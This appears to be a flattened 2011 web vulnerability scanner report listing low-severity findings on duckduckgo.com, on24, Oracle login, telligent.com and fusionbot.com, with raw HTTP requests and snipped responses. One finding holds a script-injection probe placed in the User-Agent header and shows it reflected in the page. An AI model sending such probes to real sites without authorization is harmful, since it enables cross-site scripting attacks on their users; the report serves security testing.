| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:47:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:47:16 GMT Cache-Control: max-age=1 Content-Length: 8529 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /Cross-site_scripting |
| GET /Cross-site_scripting HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:47:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:47:18 GMT Cache-Control: max-age=1 Content-Length: 13177 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /HTTP_referrer |
| GET /HTTP_referrer HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:54:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:55:00 GMT Cache-Control: max-age=1 Content-Length: 8717 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /Microsoft_Visual_Studio |
| GET /Microsoft_Visual_Studio HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:47:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:47:16 GMT Cache-Control: max-age=1 Content-Length: 9475 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /NaN |
| GET /NaN HTTP/1.1 Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _qwerly_session |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:04:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Expires: Tue, 01 Mar 2011 02:04:48 GMT Cache-Control: max-age=1 Content-Length: 9228 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /User_agent |
| GET /User_agent HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:55:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:55:02 GMT Cache-Control: max-age=1 Content-Length: 9737 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /c/Computer_arithmetic |
| GET /c/Computer_arithmetic HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:49:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:49:55 GMT Cache-Control: max-age=1 Content-Length: 59532 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... ript type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /c/Computing_acronyms |
| GET /c/Computing_acronyms HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:49:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:49:03 GMT Cache-Control: max-age=1 Content-Length: 26257 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... cript type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /c/Software_anomalies |
| GET /c/Software_anomalies HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:48:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:48:58 GMT Cache-Control: max-age=1 Content-Length: 16344 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /c/The_Simpsons |
| GET /c/The_Simpsons Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:48:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:48:37 GMT Cache-Control: max-age=1 Content-Length: 29088 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... cript type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /e.js |
| GET /e.js HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:47:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Sun, 12 Nov 1999 20:28:05 GMT Content-Length: 1456 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | / |
| GET /?q=POST+request HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:56:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:56:11 GMT Cache-Control: max-age=1 Content-Length: 7966 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /Electronic_Frontier |
| GET /Electronic_Frontier Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:57:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:57:13 GMT Cache-Control: max-age=1 Content-Length: 12991 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /HTTP_Secure |
| GET /HTTP_Secure HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:57:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:57:12 GMT Cache-Control: max-age=1 Content-Length: 13106 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /HTTP_cookie |
| GET /HTTP_cookie HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:57:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:57:10 GMT Cache-Control: max-age=1 Content-Length: 13375 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /IP_Address |
| GET /IP_Address HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:57:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Tue, 01 Mar 2011 02:57:12 GMT Cache-Control: max-age=1 Content-Length: 10016 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /e.js |
| GET /e.js HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:56:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Sun, 12 Nov 1999 20:28:05 GMT Content-Length: 1456 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /e.js |
| GET /e.js?from=h02332%40gmail Host: duckduckgo.com Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Origin: http://duckduckgo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: r=b; _qwerly_session |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:18:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Expires: Sun, 12 Nov 1999 20:28:05 GMT Content-Length: 1462 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://event.on24.com |
| Path: | /eventRegistration |
| GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)< Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:21 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=0rvu9xpQX X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... t 100%. useful to restrict content of two column reg page middlecolumn: # of pixels for middle column. default is 4. fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)< --> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://login.oracle.com |
| Path: | /mysso/signon.jsp |
| GET /mysso/signon.jsp Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A/ |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:27:53 GMT Server: Oracle-Application-Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 29 cfhOct 1969 17:04:19 GMT Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerloginadc Content-Length: 8443 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://login.oracle.com |
| Path: | /pls/orasso/orasso.wwsso |
| GET /pls/orasso/orasso.wwsso Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A/ |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:27:52 GMT Server: Oracle-Application-Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 29 cfhOct 1969 17:04:19 GMT Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerloginadc Content-Length: 8443 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://telligent.com |
| Path: | /products/request_a_demo |
| GET /products/request_a_demo Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:21:57 GMT Connection: close Content-Length: 66403 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://telligent.com |
| Path: | /resources/m/analysts |
| GET /resources/m/analysts Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:27 GMT Connection: close Content-Length: 64261 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://telligent.com |
| Path: | /resources/m/analysts |
| GET /resources/m/analysts Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:36 GMT Connection: close Content-Length: 64972 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://telligent.com |
| Path: | /resources/m/success |
| GET /resources/m/success Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:43 GMT Connection: close Content-Length: 64200 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://telligent.com |
| Path: | /support/request_an |
| GET /support/request_an Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:23:35 GMT Connection: close Content-Length: 61451 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.fusionbot.com |
| Path: | / |
| GET / HTTP/1.1 Host: www.fusionbot.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Referer: http://www.google.com |